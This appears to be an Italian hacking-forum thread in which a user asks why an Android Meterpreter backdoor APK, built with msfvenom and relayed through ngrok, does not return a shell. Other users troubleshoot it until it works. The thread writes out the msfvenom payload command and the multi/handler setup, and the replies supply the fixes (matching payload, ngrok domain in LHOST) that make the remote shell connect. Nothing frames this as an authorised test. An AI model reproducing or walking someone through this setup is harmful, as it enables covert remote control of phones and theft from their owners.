Domanda Risolto Malware backdoor esterna metasploit

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
N

n0tting

Utente Bronze
14 Dicembre 2020
79
15
7
32
Ultima modifica:
ho un problema con una backdoor (metasploit) utilizzando ngrok praticamente vado a creare una backdoor tramite il comando
msfvenom -p android/meterpreter/reverse_tcp LHOST = IP NGROK LPORT = PORTA SCELTA -o app.apk
dopo vado su ngrok per forwardare la porta scelta
dopo apro msfconsole
use exploit/multi/handler/
set LHOST ip ngrok
set LPORT porta scelta
run
vado ad aprire l app sul cellulare però non mi apre nessuna shell meterpreter su msfconsole io credo che il problema sia ngrok dato che prima di fare run io ho controllato l ip ed era cambiato quindi i due dispositivi con potevano comunicare potete darmi dei consigli grazie in anticipo
 
Ciao, credo che il tuo problema venga dal fatto che quando crei la backdoor imposti come porta quella che hai scelto tu, mentre dovresti impostare quella di Ngrok. Fammi sapere se riesci a risolvere ;).
 
  • Grazie
Reazioni: n0tting
Helplease ha detto:
Ciao, credo che il tuo problema venga dal fatto che quando crei la backdoor imposti come porta quella che hai scelto tu, mentre dovresti impostare quella di Ngrok. Fammi sapere se riesci a risolvere ;).
Clicca per espandere...
io ho fatto così
ngrok tcp 6789(porta esempio)
dopo
quando creo la beckdoor con msfvenom LPORT = metto la porta 6789
 
Quanto imposti il multi-handler devi impostare anche il payload (deve usare lo stesso payload usato dalla APK). In secndo luogo non devi usare l'IP di ngrok da quel che ricordo ma devi utilizzare il dominio che ti viene assegnato. Non ricordo se basti inserire il dominio all'interno del campo IP o se serva usare un altro campo, però il problema mi pare sia quello.

Edit: Ok, sì, devi inserire il dominio di ngrok edntro LHOST. Trovi un esempio qui
 
  • Mi piace
  • Grazie
Reazioni: Helplease e n0tting
Ultima modifica:
0xbro ha detto:
Quanto imposti il multi-handler devi impostare anche il payload (deve usare lo stesso payload usato dalla APK). In secndo luogo non devi usare l'IP di ngrok da quel che ricordo ma devi utilizzare il dominio che ti viene assegnato. Non ricordo se basti inserire il dominio all'interno del campo IP o se serva usare un altro campo, però il problema mi pare sia quello.

Edit: Ok, sì, devi inserire il dominio di ngrok edntro LHOST. Trovi un esempio qui
Clicca per espandere...
grazie mille ora provo e dopo ti faccio sapere
Messaggio unito automaticamente:

0xbro ha detto:
Quanto imposti il multi-handler devi impostare anche il payload (deve usare lo stesso payload usato dalla APK). In secndo luogo non devi usare l'IP di ngrok da quel che ricordo ma devi utilizzare il dominio che ti viene assegnato. Non ricordo se basti inserire il dominio all'interno del campo IP o se serva usare un altro campo, però il problema mi pare sia quello.

Edit: Ok, sì, devi inserire il dominio di ngrok edntro LHOST. Trovi un esempio qui
Clicca per espandere...
ci sono riuscito grazie
 
  • Mi piace
Reazioni: 0xbro
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

T
Domanda Jobs e sessions Metasploit
  • 1
  • 483
1
483
Pentesting e Ethical Hacking
--- Ra ---
N
Discussione #SalviamoPyinstaller - Tutorial per insegnare agli script kiddies come compilare i malware senza "sporcare" Pyinstaller
  • Chiuso
  • 1
  • 280
1
280
Sicurezza Informatica
JunkCoder
N
Discussione CVE-2014-0514 not working on updated Android devices? Firing a workaround!
  • Chiuso
  • 0
  • 227
0
227
Sicurezza Informatica
Netcat
N
Discussione Gli EXITFUNC, cosa sono, cosa fanno, come vanno usati in Metasploit
  • 0
  • 366
0
366
Pentesting e Ethical Hacking
Netcat
Top Bottom
Indietro